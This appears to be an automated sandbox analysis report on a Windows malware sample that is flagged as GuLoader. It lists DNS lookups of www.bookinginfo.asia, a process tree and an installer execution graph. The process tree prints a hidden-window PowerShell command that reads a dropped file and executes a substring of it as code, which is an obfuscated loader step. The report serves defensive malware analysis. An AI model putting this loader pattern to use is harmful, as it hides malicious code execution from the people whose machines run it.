                                                Oct 29, 2024 14:18:39.812179089 CET53620101.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:44.796170950 CET5661453192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:44.806082010 CET53566141.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:49.829406977 CET5979453192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:49.839019060 CET53597941.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:54.765526056 CET6167253192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:54.777455091 CET53616721.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:59.765625000 CET6087753192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:59.775131941 CET53608771.1.1.1192.168.2.6
                                                Oct 29, 2024 14:19:04.767098904 CET6241753192.168.2.61.1.1.1
                                                Oct 29, 2024 14:19:04.777487993 CET53624171.1.1.1192.168.2.6
                                                Oct 29, 2024 14:19:09.796567917 CET5086953192.168.2.61.1.1.1
                                                Oct 29, 2024 14:19:09.806176901 CET53508691.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 29, 2024 14:18:15.696867943 CET192.168.2.61.1.1.10x5419Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:19.796988010 CET192.168.2.61.1.1.10xfabbStandard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:24.812746048 CET192.168.2.61.1.1.10xd5f9Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:29.859250069 CET192.168.2.61.1.1.10xd49Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:34.812494040 CET192.168.2.61.1.1.10x8f5Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:39.796499968 CET192.168.2.61.1.1.10x1033Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:44.796170950 CET192.168.2.61.1.1.10x67d9Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:49.829406977 CET192.168.2.61.1.1.10xcf06Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:54.765526056 CET192.168.2.61.1.1.10x67e3Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:59.765625000 CET192.168.2.61.1.1.10xfa5cStandard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:19:04.767098904 CET192.168.2.61.1.1.10xd7a3Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:19:09.796567917 CET192.168.2.61.1.1.10x40f1Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 29, 2024 14:18:15.706840038 CET1.1.1.1192.168.2.60x5419Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:19.921226978 CET1.1.1.1192.168.2.60xfabbName error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:24.823158026 CET1.1.1.1192.168.2.60xd5f9Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:29.868659019 CET1.1.1.1192.168.2.60xd49Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:34.822526932 CET1.1.1.1192.168.2.60x8f5Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:39.812179089 CET1.1.1.1192.168.2.60x1033Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:44.806082010 CET1.1.1.1192.168.2.60x67d9Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:49.839019060 CET1.1.1.1192.168.2.60xcf06Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:54.777455091 CET1.1.1.1192.168.2.60x67e3Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:18:59.775131941 CET1.1.1.1192.168.2.60xfa5cName error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:19:04.777487993 CET1.1.1.1192.168.2.60xd7a3Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false
                                                Oct 29, 2024 14:19:09.806176901 CET1.1.1.1192.168.2.60x40f1Name error (3)www.bookinginfo.asianonenoneA (IP address)IN (0x0001)false

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:09:17:05
                                                Start date:29/10/2024
                                                Path:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\3lH2EWD4wU.exe"
                                                Imagebase:0x400000
                                                File size:738'435 bytes
                                                MD5 hash:2F9C0BA283506D8333E4F59B29FBEBA3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:09:17:06
                                                Start date:29/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
                                                Imagebase:0xfd0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:09:17:06
                                                Start date:29/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:09:18:06
                                                Start date:29/10/2024
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                Imagebase:0x4b0000
                                                File size:59'904 bytes
                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3447816394.0000000007D74000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:23.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.3%
                                                  Total number of Nodes:1274
                                                  Total number of Limit Nodes:31
                                                  execution_graph 3590 402340 3591 402acb 17 API calls 3590->3591 3592 402351 3591->3592 3593 402acb 17 API calls 3592->3593 3594 40235a 3593->3594 3595 402acb 17 API calls 3594->3595 3596 402364 GetPrivateProfileStringA 3595->3596 3597 401d41 GetDlgItem GetClientRect 3598 402acb 17 API calls 3597->3598 3599 401d71 LoadImageA SendMessageA 3598->3599 3600 402957 3599->3600 3601 401d8f DeleteObject 3599->3601 3601->3600 3602 404a44 GetDlgItem GetDlgItem 3603 404a96 7 API calls 3602->3603 3617 404cae 3602->3617 3604 404b39 DeleteObject 3603->3604 3605 404b2c SendMessageA 3603->3605 3606 404b42 3604->3606 3605->3604 3608 404b79 3606->3608 3610 405fc2 17 API calls 3606->3610 3607 404d92 3609 404e3e 3607->3609 3613 404ca1 3607->3613 3619 404deb SendMessageA 3607->3619 3611 40403f 18 API calls 3608->3611 3614 404e50 3609->3614 3615 404e48 SendMessageA 3609->3615 3616 404b5b SendMessageA SendMessageA 3610->3616 3612 404b8d 3611->3612 3618 40403f 18 API calls 3612->3618 3620 4040a6 8 API calls 3613->3620 3626 404e62 ImageList_Destroy 3614->3626 3627 404e69 3614->3627 3631 404e79 3614->3631 3615->3614 3616->3606 3617->3607 3634 404d1f 3617->3634 3655 404992 SendMessageA 3617->3655 3635 404b9b 3618->3635 3619->3613 3624 404e00 SendMessageA 3619->3624 3625 405034 3620->3625 3621 404d84 SendMessageA 3621->3607 3623 404fe8 3623->3613 3632 404ffa ShowWindow GetDlgItem ShowWindow 3623->3632 3630 404e13 3624->3630 3626->3627 3628 404e72 GlobalFree 3627->3628 3627->3631 3628->3631 3629 404c6f GetWindowLongA SetWindowLongA 3633 404c88 3629->3633 3640 404e24 SendMessageA 3630->3640 3631->3623 3647 404eb4 3631->3647 3660 404a12 3631->3660 3632->3613 3636 404ca6 3633->3636 3637 404c8e ShowWindow 3633->3637 3634->3607 3634->3621 3635->3629 3639 404bea SendMessageA 3635->3639 3641 404c69 3635->3641 3644 404c26 SendMessageA 3635->3644 3645 404c37 SendMessageA 3635->3645 3654 404074 SendMessageA 3636->3654 3653 404074 SendMessageA 3637->3653 3639->3635 3640->3609 3641->3629 3641->3633 3642 404ef8 3648 404fbe InvalidateRect 3642->3648 3652 404f6c SendMessageA SendMessageA 3642->3652 3644->3635 3645->3635 3647->3642 3649 404ee2 SendMessageA 3647->3649 3648->3623 3650 404fd4 3648->3650 3649->3642 3669 40494d 3650->3669 3652->3642 3653->3613 3654->3617 3656 4049f1 SendMessageA 3655->3656 3657 4049b5 GetMessagePos ScreenToClient SendMessageA 3655->3657 3658 4049e9 3656->3658 3657->3658 3659 4049ee 3657->3659 3658->3634 3659->3656 3672 405fa0 lstrcpynA 3660->3672 3662 404a25 3673 405efe wsprintfA 3662->3673 3664 404a2f 3665 40140b 2 API calls 3664->3665 3666 404a38 3665->3666 3674 405fa0 lstrcpynA 3666->3674 3668 404a3f 3668->3647 3675 404888 3669->3675 3671 404962 3671->3623 3672->3662 3673->3664 3674->3668 3676 40489e 3675->3676 3677 405fc2 17 API calls 3676->3677 3678 404902 3677->3678 3679 405fc2 17 API calls 3678->3679 3680 40490d 3679->3680 3681 405fc2 17 API calls 3680->3681 3682 404923 lstrlenA wsprintfA SetDlgItemTextA 3681->3682 3682->3671 3683 401746 3684 402acb 17 API calls 3683->3684 3685 40174d 3684->3685 3686 405b68 2 API calls 3685->3686 3687 401754 3686->3687 3687->3687 3688 401947 3689 402acb 17 API calls 3688->3689 3690 40194e lstrlenA 3689->3690 3691 40257d 3690->3691 3695 4025ca 3696 402aa9 17 API calls 3695->3696 3702 4025d4 3696->3702 3697 402642 3698 405bb1 ReadFile 3698->3702 3699 402644 3704 405efe wsprintfA 3699->3704 3701 402654 3701->3697 3703 40266a SetFilePointer 3701->3703 3702->3697 3702->3698 3702->3699 3702->3701 3703->3697 3704->3697 3705 40224b 3706 402acb 17 API calls 3705->3706 3707 402251 3706->3707 3708 402acb 17 API calls 3707->3708 3709 40225a 3708->3709 3710 402acb 17 API calls 3709->3710 3711 402263 3710->3711 3712 4062a3 2 API calls 3711->3712 3713 40226c 3712->3713 3714 402270 3713->3714 3715 40227d lstrlenA lstrlenA 3713->3715 3716 4050c7 24 API calls 3714->3716 3717 4050c7 24 API calls 3715->3717 3719 402278 3716->3719 3718 4022b9 SHFileOperationA 3717->3718 3718->3714 3718->3719 3720 4028cb 3721 402aa9 17 API calls 3720->3721 3722 4028d1 3721->3722 3723 402906 3722->3723 3724 40271c 3722->3724 3726 4028e3 3722->3726 3723->3724 3725 405fc2 17 API calls 3723->3725 3725->3724 3726->3724 3728 405efe wsprintfA 3726->3728 3728->3724 3729 4022cd 3730 4022d4 3729->3730 3734 4022e7 3729->3734 3731 405fc2 17 API calls 3730->3731 3732 4022e1 3731->3732 3733 4056bc MessageBoxIndirectA 3732->3733 3733->3734 3735 4044d1 3736 4044fd 3735->3736 3737 40450e 3735->3737 3796 4056a0 GetDlgItemTextA 3736->3796 3739 40451a GetDlgItem 3737->3739 3743 404579 3737->3743 3742 40452e 3739->3742 3740 40465d 3794 404807 3740->3794 3798 4056a0 GetDlgItemTextA 3740->3798 3741 404508 3744 40620a 5 API calls 3741->3744 3745 404542 SetWindowTextA 3742->3745 3747 4059d1 4 API calls 3742->3747 3743->3740 3749 405fc2 17 API calls 3743->3749 3743->3794 3744->3737 3748 40403f 18 API calls 3745->3748 3753 404538 3747->3753 3754 40455e 3748->3754 3755 4045ed SHBrowseForFolderA 3749->3755 3750 40468d 3756 405a26 18 API calls 3750->3756 3751 4040a6 8 API calls 3752 40481b 3751->3752 3753->3745 3760 405938 3 API calls 3753->3760 3757 40403f 18 API calls 3754->3757 3755->3740 3758 404605 CoTaskMemFree 3755->3758 3759 404693 3756->3759 3761 40456c 3757->3761 3762 405938 3 API calls 3758->3762 3799 405fa0 lstrcpynA 3759->3799 3760->3745 3797 404074 SendMessageA 3761->3797 3764 404612 3762->3764 3767 404649 SetDlgItemTextA 3764->3767 3771 405fc2 17 API calls 3764->3771 3766 404572 3769 406338 5 API calls 3766->3769 3767->3740 3768 4046aa 3770 406338 5 API calls 3768->3770 3769->3743 3777 4046b1 3770->3777 3772 404631 lstrcmpiA 3771->3772 3772->3767 3775 404642 lstrcatA 3772->3775 3773 4046ed 3800 405fa0 lstrcpynA 3773->3800 3775->3767 3776 4046f4 3778 4059d1 4 API calls 3776->3778 3777->3773 3781 40597f 2 API calls 3777->3781 3783 404745 3777->3783 3779 4046fa GetDiskFreeSpaceA 3778->3779 3782 40471e MulDiv 3779->3782 3779->3783 3781->3777 3782->3783 3784 4047b6 3783->3784 3786 40494d 20 API calls 3783->3786 3785 4047d9 3784->3785 3787 40140b 2 API calls 3784->3787 3801 404061 KiUserCallbackDispatcher 3785->3801 3788 4047a3 3786->3788 3787->3785 3790 4047b8 SetDlgItemTextA 3788->3790 3791 4047a8 3788->3791 3790->3784 3793 404888 20 API calls 3791->3793 3792 4047f5 3792->3794 3802 40442a 3792->3802 3793->3784 3794->3751 3796->3741 3797->3766 3798->3750 3799->3768 3800->3776 3801->3792 3803 404438 3802->3803 3804 40443d SendMessageA 3802->3804 3803->3804 3804->3794 3805 4020d1 3806 402acb 17 API calls 3805->3806 3807 4020d8 3806->3807 3808 402acb 17 API calls 3807->3808 3809 4020e2 3808->3809 3810 402acb 17 API calls 3809->3810 3811 4020ec 3810->3811 3812 402acb 17 API calls 3811->3812 3813 4020f6 3812->3813 3814 402acb 17 API calls 3813->3814 3815 402100 3814->3815 3816 402142 CoCreateInstance 3815->3816 3817 402acb 17 API calls 3815->3817 3820 402161 3816->3820 3822 40220c 3816->3822 3817->3816 3818 401423 24 API calls 3819 402242 3818->3819 3821 4021ec MultiByteToWideChar 3820->3821 3820->3822 3821->3822 3822->3818 3822->3819 3823 4026d4 3824 4026da 3823->3824 3825 4026de FindNextFileA 3824->3825 3828 4026f0 3824->3828 3826 40272f 3825->3826 3825->3828 3829 405fa0 lstrcpynA 3826->3829 3829->3828 3000 4023d6 3001 402acb 17 API calls 3000->3001 3002 4023e8 3001->3002 3003 402acb 17 API calls 3002->3003 3004 4023f2 3003->3004 3017 402b5b 3004->3017 3007 402427 3009 402433 3007->3009 3012 402aa9 17 API calls 3007->3012 3008 402acb 17 API calls 3011 402420 lstrlenA 3008->3011 3013 402452 RegSetValueExA 3009->3013 3021 402f9c 3009->3021 3010 40271c 3011->3007 3012->3009 3015 402468 RegCloseKey 3013->3015 3015->3010 3018 402b76 3017->3018 3041 405e54 3018->3041 3023 402fb2 3021->3023 3022 402fe0 3045 4031ae 3022->3045 3023->3022 3050 4031c4 SetFilePointer 3023->3050 3027 403147 3030 403189 3027->3030 3033 40314b 3027->3033 3028 402ffd GetTickCount 3029 403131 3028->3029 3037 40304c 3028->3037 3029->3013 3032 4031ae ReadFile 3030->3032 3031 4031ae ReadFile 3031->3037 3032->3029 3033->3029 3034 4031ae ReadFile 3033->3034 3035 405be0 WriteFile 3033->3035 3034->3033 3035->3033 3036 4030a2 GetTickCount 3036->3037 3037->3029 3037->3031 3037->3036 3038 4030c7 MulDiv wsprintfA 3037->3038 3048 405be0 WriteFile 3037->3048 3039 4050c7 24 API calls 3038->3039 3039->3037 3042 405e63 3041->3042 3043 402402 3042->3043 3044 405e6e RegCreateKeyExA 3042->3044 3043->3007 3043->3008 3043->3010 3044->3043 3051 405bb1 ReadFile 3045->3051 3049 405bfe 3048->3049 3049->3037 3050->3022 3052 402feb 3051->3052 3052->3027 3052->3028 3052->3029 3830 4014d6 3831 402aa9 17 API calls 3830->3831 3832 4014dc Sleep 3831->3832 3834 402957 3832->3834 3053 401759 3054 402acb 17 API calls 3053->3054 3055 401760 3054->3055 3056 401786 3055->3056 3057 40177e 3055->3057 3096 405fa0 lstrcpynA 3056->3096 3095 405fa0 lstrcpynA 3057->3095 3060 401784 3063 40620a 5 API calls 3060->3063 3061 401791 3097 405938 lstrlenA CharPrevA 3061->3097 3069 4017a3 3063->3069 3068 4017ba CompareFileTime 3068->3069 3069->3068 3070 40187e 3069->3070 3075 405fa0 lstrcpynA 3069->3075 3078 405fc2 17 API calls 3069->3078 3090 401855 3069->3090 3091 405b14 GetFileAttributesA 3069->3091 3094 405b39 GetFileAttributesA CreateFileA 3069->3094 3100 4062a3 FindFirstFileA 3069->3100 3103 4056bc 3069->3103 3071 4050c7 24 API calls 3070->3071 3072 401888 3071->3072 3074 402f9c 31 API calls 3072->3074 3073 4050c7 24 API calls 3081 40186a 3073->3081 3076 40189b 3074->3076 3075->3069 3077 4018af SetFileTime 3076->3077 3079 4018c1 CloseHandle 3076->3079 3077->3079 3078->3069 3080 4018d2 3079->3080 3079->3081 3082 4018d7 3080->3082 3083 4018ea 3080->3083 3084 405fc2 17 API calls 3082->3084 3085 405fc2 17 API calls 3083->3085 3088 4018df lstrcatA 3084->3088 3086 4018f2 3085->3086 3089 4056bc MessageBoxIndirectA 3086->3089 3088->3086 3089->3081 3090->3073 3090->3081 3092 405b33 3091->3092 3093 405b26 SetFileAttributesA 3091->3093 3092->3069 3093->3092 3094->3069 3095->3060 3096->3061 3098 405952 lstrcatA 3097->3098 3099 401797 lstrcatA 3097->3099 3098->3099 3099->3060 3101 4062c4 3100->3101 3102 4062b9 FindClose 3100->3102 3101->3069 3102->3101 3106 4056d1 3103->3106 3104 40571d 3104->3069 3105 4056e5 MessageBoxIndirectA 3105->3104 3106->3104 3106->3105 3835 401659 3836 402acb 17 API calls 3835->3836 3837 40165f 3836->3837 3838 4062a3 2 API calls 3837->3838 3839 401665 3838->3839 3840 401959 3841 402aa9 17 API calls 3840->3841 3842 401960 3841->3842 3843 402aa9 17 API calls 3842->3843 3844 40196d 3843->3844 3845 402acb 17 API calls 3844->3845 3846 401984 lstrlenA 3845->3846 3848 401994 3846->3848 3847 4019d4 3848->3847 3852 405fa0 lstrcpynA 3848->3852 3850 4019c4 3850->3847 3851 4019c9 lstrlenA 3850->3851 3851->3847 3852->3850 3853 401cda 3854 402aa9 17 API calls 3853->3854 3855 401ce0 IsWindow 3854->3855 3856 401a0e 3855->3856 3857 401a5e 3858 402aa9 17 API calls 3857->3858 3859 401a67 3858->3859 3860 402aa9 17 API calls 3859->3860 3861 401a0e 3860->3861 3862 401f61 3863 402acb 17 API calls 3862->3863 3864 401f68 3863->3864 3865 406338 5 API calls 3864->3865 3866 401f77 3865->3866 3867 401f8f GlobalAlloc 3866->3867 3876 401ff7 3866->3876 3868 401fa3 3867->3868 3867->3876 3869 406338 5 API calls 3868->3869 3870 401faa 3869->3870 3871 406338 5 API calls 3870->3871 3872 401fb4 3871->3872 3872->3876 3877 405efe wsprintfA 3872->3877 3874 401feb 3878 405efe wsprintfA 3874->3878 3877->3874 3878->3876 3879 402561 3880 402acb 17 API calls 3879->3880 3881 402568 3880->3881 3884 405b39 GetFileAttributesA CreateFileA 3881->3884 3883 402574 3884->3883 3885 401563 3886 4028ff 3885->3886 3889 405efe wsprintfA 3886->3889 3888 402904 3889->3888 3890 401b63 3891 401b70 3890->3891 3892 401bb4 3890->3892 3895 4022d4 3891->3895 3900 401b87 3891->3900 3893 401bb8 3892->3893 3894 401bdd GlobalAlloc 3892->3894 3903 401bf8 3893->3903 3911 405fa0 lstrcpynA 3893->3911 3896 405fc2 17 API calls 3894->3896 3897 405fc2 17 API calls 3895->3897 3896->3903 3899 4022e1 3897->3899 3904 4056bc MessageBoxIndirectA 3899->3904 3909 405fa0 lstrcpynA 3900->3909 3901 401bca GlobalFree 3901->3903 3904->3903 3905 401b96 3910 405fa0 lstrcpynA 3905->3910 3907 401ba5 3912 405fa0 lstrcpynA 3907->3912 3909->3905 3910->3907 3911->3901 3912->3903 2892 4024e5 2893 402b0b 17 API calls 2892->2893 2894 4024ef 2893->2894 2904 402aa9 2894->2904 2896 4024f8 2897 402506 2896->2897 2898 40271c 2896->2898 2899 402513 RegEnumKeyA 2897->2899 2900 40251f RegEnumValueA 2897->2900 2901 40253b RegCloseKey 2899->2901 2900->2901 2902 402534 2900->2902 2901->2898 2902->2901 2905 405fc2 17 API calls 2904->2905 2906 402abe 2905->2906 2906->2896 3913 40166a 3914 402acb 17 API calls 3913->3914 3915 401671 3914->3915 3916 402acb 17 API calls 3915->3916 3917 40167a 3916->3917 3918 402acb 17 API calls 3917->3918 3919 401683 MoveFileA 3918->3919 3920 401696 3919->3920 3921 40168f 3919->3921 3923 4062a3 2 API calls 3920->3923 3925 402242 3920->3925 3922 401423 24 API calls 3921->3922 3922->3925 3924 4016a5 3923->3924 3924->3925 3926 405d7f 36 API calls 3924->3926 3926->3921 3107 403b6b 3108 403b83 3107->3108 3109 403cbe 3107->3109 3108->3109 3110 403b8f 3108->3110 3111 403d0f 3109->3111 3112 403ccf GetDlgItem GetDlgItem 3109->3112 3113 403b9a SetWindowPos 3110->3113 3114 403bad 3110->3114 3116 403d69 3111->3116 3121 401389 2 API calls 3111->3121 3115 40403f 18 API calls 3112->3115 3113->3114 3118 403bb2 ShowWindow 3114->3118 3119 403bca 3114->3119 3120 403cf9 SetClassLongA 3115->3120 3117 40408b SendMessageA 3116->3117 3122 403cb9 3116->3122 3148 403d7b 3117->3148 3118->3119 3123 403bd2 DestroyWindow 3119->3123 3124 403bec 3119->3124 3125 40140b 2 API calls 3120->3125 3126 403d41 3121->3126 3127 403fc8 3123->3127 3128 403bf1 SetWindowLongA 3124->3128 3129 403c02 3124->3129 3125->3111 3126->3116 3130 403d45 SendMessageA 3126->3130 3127->3122 3138 403ff9 ShowWindow 3127->3138 3128->3122 3133 403cab 3129->3133 3134 403c0e GetDlgItem 3129->3134 3130->3122 3131 40140b 2 API calls 3131->3148 3132 403fca DestroyWindow EndDialog 3132->3127 3137 4040a6 8 API calls 3133->3137 3135 403c21 SendMessageA IsWindowEnabled 3134->3135 3136 403c3e 3134->3136 3135->3122 3135->3136 3140 403c4b 3136->3140 3141 403c92 SendMessageA 3136->3141 3142 403c5e 3136->3142 3152 403c43 3136->3152 3137->3122 3138->3122 3139 405fc2 17 API calls 3139->3148 3140->3141 3140->3152 3141->3133 3145 403c66 3142->3145 3146 403c7b 3142->3146 3143 404018 SendMessageA 3147 403c79 3143->3147 3144 40403f 18 API calls 3144->3148 3184 40140b 3145->3184 3149 40140b 2 API calls 3146->3149 3147->3133 3148->3122 3148->3131 3148->3132 3148->3139 3148->3144 3153 40403f 18 API calls 3148->3153 3169 403f0a DestroyWindow 3148->3169 3151 403c82 3149->3151 3151->3133 3151->3152 3152->3143 3154 403df6 GetDlgItem 3153->3154 3155 403e13 ShowWindow KiUserCallbackDispatcher 3154->3155 3156 403e0b 3154->3156 3178 404061 KiUserCallbackDispatcher 3155->3178 3156->3155 3158 403e3d EnableWindow 3163 403e51 3158->3163 3159 403e56 GetSystemMenu EnableMenuItem SendMessageA 3160 403e86 SendMessageA 3159->3160 3159->3163 3160->3163 3163->3159 3179 404074 SendMessageA 3163->3179 3180 403b4c 3163->3180 3183 405fa0 lstrcpynA 3163->3183 3165 403eb5 lstrlenA 3166 405fc2 17 API calls 3165->3166 3167 403ec6 SetWindowTextA 3166->3167 3168 401389 2 API calls 3167->3168 3168->3148 3169->3127 3170 403f24 CreateDialogParamA 3169->3170 3170->3127 3171 403f57 3170->3171 3172 40403f 18 API calls 3171->3172 3173 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3172->3173 3174 401389 2 API calls 3173->3174 3175 403fa8 3174->3175 3175->3122 3176 403fb0 ShowWindow 3175->3176 3177 40408b SendMessageA 3176->3177 3177->3127 3178->3158 3179->3163 3181 405fc2 17 API calls 3180->3181 3182 403b5a SetWindowTextA 3181->3182 3182->3163 3183->3165 3185 401389 2 API calls 3184->3185 3186 401420 3185->3186 3186->3152 3927 4019ed 3928 402acb 17 API calls 3927->3928 3929 4019f4 3928->3929 3930 402acb 17 API calls 3929->3930 3931 4019fd 3930->3931 3932 401a04 lstrcmpiA 3931->3932 3933 401a16 lstrcmpA 3931->3933 3934 401a0a 3932->3934 3933->3934 3935 40156f 3936 401586 3935->3936 3937 40157f ShowWindow 3935->3937 3938 401594 ShowWindow 3936->3938 3939 402957 3936->3939 3937->3936 3938->3939 3940 402473 3941 402b0b 17 API calls 3940->3941 3942 40247d 3941->3942 3943 402acb 17 API calls 3942->3943 3944 402486 3943->3944 3945 402490 RegQueryValueExA 3944->3945 3950 40271c 3944->3950 3946 4024b0 3945->3946 3947 4024b6 RegCloseKey 3945->3947 3946->3947 3951 405efe wsprintfA 3946->3951 3947->3950 3951->3947 3952 4014f4 SetForegroundWindow 3953 402957 3952->3953 3954 404175 lstrcpynA lstrlenA 3955 401cfb 3956 402aa9 17 API calls 3955->3956 3957 401d02 3956->3957 3958 402aa9 17 API calls 3957->3958 3959 401d0e GetDlgItem 3958->3959 3960 40257d 3959->3960 3236 4022fc 3237 402304 3236->3237 3238 40230a 3236->3238 3239 402acb 17 API calls 3237->3239 3240 40231a 3238->3240 3241 402acb 17 API calls 3238->3241 3239->3238 3242 402acb 17 API calls 3240->3242 3245 402328 3240->3245 3241->3240 3242->3245 3243 402acb 17 API calls 3244 402331 WritePrivateProfileStringA 3243->3244 3245->3243 3961 402c7c 3962 402c8b SetTimer 3961->3962 3964 402ca4 3961->3964 3962->3964 3963 402cf9 3964->3963 3965 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3964->3965 3965->3963 3966 4018fd 3967 401934 3966->3967 3968 402acb 17 API calls 3967->3968 3969 401939 3968->3969 3970 405768 67 API calls 3969->3970 3971 401942 3970->3971 3972 4026fe 3973 402acb 17 API calls 3972->3973 3974 402705 FindFirstFileA 3973->3974 3975 402728 3974->3975 3979 402718 3974->3979 3976 40272f 3975->3976 3980 405efe wsprintfA 3975->3980 3981 405fa0 lstrcpynA 3976->3981 3980->3976 3981->3979 3982 401000 3983 401037 BeginPaint GetClientRect 3982->3983 3984 40100c DefWindowProcA 3982->3984 3986 4010f3 3983->3986 3987 401179 3984->3987 3988 401073 CreateBrushIndirect FillRect DeleteObject 3986->3988 3989 4010fc 3986->3989 3988->3986 3990 401102 CreateFontIndirectA 3989->3990 3991 401167 EndPaint 3989->3991 3990->3991 3992 401112 6 API calls 3990->3992 3991->3987 3992->3991 3993 401900 3994 402acb 17 API calls 3993->3994 3995 401907 3994->3995 3996 4056bc MessageBoxIndirectA 3995->3996 3997 401910 3996->3997 2801 402381 2802 4023b3 2801->2802 2803 402388 2801->2803 2818 402acb 2802->2818 2813 402b0b 2803->2813 2809 402399 2811 402acb 17 API calls 2809->2811 2810 4023c7 2812 4023a0 RegDeleteValueA RegCloseKey 2811->2812 2812->2810 2814 402acb 17 API calls 2813->2814 2815 402b22 2814->2815 2828 405e26 2815->2828 2819 402ad7 2818->2819 2832 405fc2 2819->2832 2822 4023ba 2824 402b89 2822->2824 2825 402b95 2824->2825 2826 402b9c 2824->2826 2825->2810 2826->2825 2870 402bcd 2826->2870 2829 405e35 2828->2829 2830 40238f 2829->2830 2831 405e3e RegOpenKeyExA 2829->2831 2830->2809 2830->2810 2831->2830 2844 405fcf 2832->2844 2833 4061f1 2834 402af8 2833->2834 2865 405fa0 lstrcpynA 2833->2865 2834->2822 2849 40620a 2834->2849 2836 4061cb lstrlenA 2836->2844 2839 405fc2 10 API calls 2839->2836 2840 4060e7 GetSystemDirectoryA 2840->2844 2842 4060fa GetWindowsDirectoryA 2842->2844 2843 40620a 5 API calls 2843->2844 2844->2833 2844->2836 2844->2839 2844->2840 2844->2842 2844->2843 2845 40612e SHGetSpecialFolderLocation 2844->2845 2846 405fc2 10 API calls 2844->2846 2847 406174 lstrcatA 2844->2847 2858 405e87 2844->2858 2863 405efe wsprintfA 2844->2863 2864 405fa0 lstrcpynA 2844->2864 2845->2844 2848 406146 SHGetPathFromIDListA CoTaskMemFree 2845->2848 2846->2844 2847->2844 2848->2844 2855 406216 2849->2855 2850 40627e 2851 406282 CharPrevA 2850->2851 2854 40629d 2850->2854 2851->2850 2852 406273 CharNextA 2852->2850 2852->2855 2854->2822 2855->2850 